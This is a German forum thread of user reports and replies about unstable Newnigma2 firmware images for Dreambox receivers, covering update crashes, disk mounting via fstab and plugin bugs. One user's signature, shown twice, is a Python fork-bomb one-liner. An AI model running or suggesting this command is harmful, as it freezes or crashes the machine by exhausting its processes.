Sammelthread für unstable images DM8000/DM800/DM500HD ab 19.05.2010

This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

  • Original von cruiser
    ... noch mal die Frage.
    ich lese jetzt wieder im changelog für das unstable etwas über oscam - ich kann aber unter emus nix mit oscam finden, wo hat es sich denn versteckt ?(

    Gruß
    cruiser


    das hat hier nix zu suchen *g*
  • Hallo!

    Habe heute ein Online Update durchgeführt.
    57 Pakete 0 Fehler.
    Beim Starten der Dream kam ein green Screen.
    Neu geflasht dann ging wieder alles.
    hab ein Plugin gestern probiert,das den root vergrößert

    Zitat von Gutermine:
    Nachdem man aber auf der 8000er den Flash für root auch ganz leicht von dem 64MB Flashbereich in das 128MB Flashbereich verschieben kann (mit entsprechendem Platzzuwachs) wollte ich mal fragen ob ich Euch ein maxroot Plugin machen soll ?

    Wäre ein einfaches ipk das man auf der 8000er einfach installiert, rebootet und schon hat man doppel so viel Platz im root filesystem.

    War das der Fehler?
    Files
  • Original von byte
    Original von loui
    War das der Fehler?


    Nö,

    habe ich auch drauf und läuft vor und nach update fehlerfrei, wobei sich der zugewinn

    an speicher nicht bemerkbar macht. Zumindest empfinde ich das so.



    ähm es wird hier vom flash speicher geredet der sich quasi verdoppelt nicht zu vergleichen mit dem Ram.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Hatte mich so gefreut, ab heute DMConcinnity-HD mit Tuneranzeige.

    Geht auch, aber 2.SSD-Platte wird nicht mehr eingebunden.

    Wird im Festplattenmenü angezeigt.

    Mit 3.0 alles super.

    Und Configurationbackup, bleibt beim Neustart hängen(war schon öfters mal).
  • Original von Gerald Z
    Hatte mich so gefreut, ab heute DMConcinnity-HD mit Tuneranzeige.

    Geht auch, aber 2.SSD-Platte wird nicht mehr eingebunden.

    Wird im Festplattenmenü angezeigt.

    Mit 3.0 alles super.

    Und Configurationbackup, bleibt beim Neustart hängen(war schon öfters mal).


    Ajo das iss absicht die ganze zeit wurde das einfach mit eingebunden vom devicemanager dieser
    kümmert sich ab sofort nur noch um usb medien alles was an sata/esata angeklemmt wurde muss über /etc/fstab eingebunden werden.Schau dir mal den eintrag darin an für die erste festplatte da kannste spielend die zweite beliebieg einbinden.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Also wie beim alten 2.8.4 die tstab bearbeiten.

    Werde ich mir mal anschauen.

    Bloß was machen da Laien?

    Ich bin auch kein Profi, war aber einer der Ersten, die mit 2 Platten reingewachsen sind.

    P.S. Danke kati910. Läuft wieder alles super, inkl. DMConcinnity-HD (Tuner+Kanalnr.+alles wählbar)usw. usw.

    DANKE an alle Fleißigen im Hintergrund

    The post was edited 1 time, last by Gerald Z ().

  • Original von cruiser
    Hallo,

    es lassen sich im unstable keine picons mehr auf cf installieren ?(

    Gruß
    cruiser
    :glaskugel2:
    » Chuck Norris kann Zwiebeln zum Weinen bringen «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

    Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen.
  • Original von nixkoenner
    Original von cruiser
    Hallo,

    es lassen sich im unstable keine picons mehr auf cf installieren ?(

    Gruß
    cruiser
    :glaskugel2:

    ... lasst ihr mich jetzt dumm sterben, denn ich habe hier im thread nix gefunden, dass das nicht mehr gehen soll. Als ich das 3.0 zum release neu geflasht habe und die Einstellungen zurückgesichert habe, bekam ich auch keine Fehlermeldung bezüglich der picons bekommen.
    Geht jetzt nur noch USB? Wenn ich die picons auf hdd installiere und dann auf cf verschiebe, werden sie noch sauber angezeigt.

    Gruß
    cruiser

    DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily

    The post was edited 1 time, last by cruiser ().

  • Hallo,

    erstmal ein großes Lob an das Newnigma-Team für die Arbeit.

    Seit ein paar Tagen habe ich das Problem, dass das Softwareupdate immer mit einem Green-Screen abstürzt. Und zwar immer dann, wenn ich gefragt werde, ob ich meine veränderte Webradio Favoritenliste behalten möchte (antworte immer mit "Ja").
    Wenn ich danach das Software Update nochmals starte, läuft es ohne Probleme durch, wahrscheinlich weil diese Abfrage nicht mehr kommt.

    Ich habe eine DM800 mit interner und USB-Festplatte mit (natürlich) dem Unstable-Image im Flash.
    Crash-Log ist angehängt.

    Rene
    Files
  • Original von Bab72de
    Crash-Log ist angehängt.
    Rene



    hmmm das sieht nach einem bug aus versteh aber noch nicht warum *es.ist.einfach.zu.heiss*


    TypeError: 1st arg must be a string, optionaly 2nd arg can be the string length


    kannst du mal beschreiben was du genau machst ?
    » Chuck Norris kann Zwiebeln zum Weinen bringen «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

    Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen.
  • kannst du mal beschreiben was du genau machst ?

    Wie oben schon geschrieben, ich lasse das online Software Update laufen. Wenn das Paket des Newnigma2-Webradio-Plugins aktualisiert wird, kommt die Abfrage, ob ich meine eigene Favoritenliste behalten möchte. Da ich das will :) beantworte ich diese Frage mit "Ja". Und genau an dem Punkt, nach dem Bestätigen mit "OK", kommt der Green-Screen. Wahrscheinlich ist der Fehler beim Vearbeiten der Abfrage-antwort, kenne mich aber leider nicht wirklich gut in der Materie aus.
    Der Absturz passiert aber auch erst seit dieser Woche, davor wurde die Abfrage immer korrekt vearbeitet.

    Rene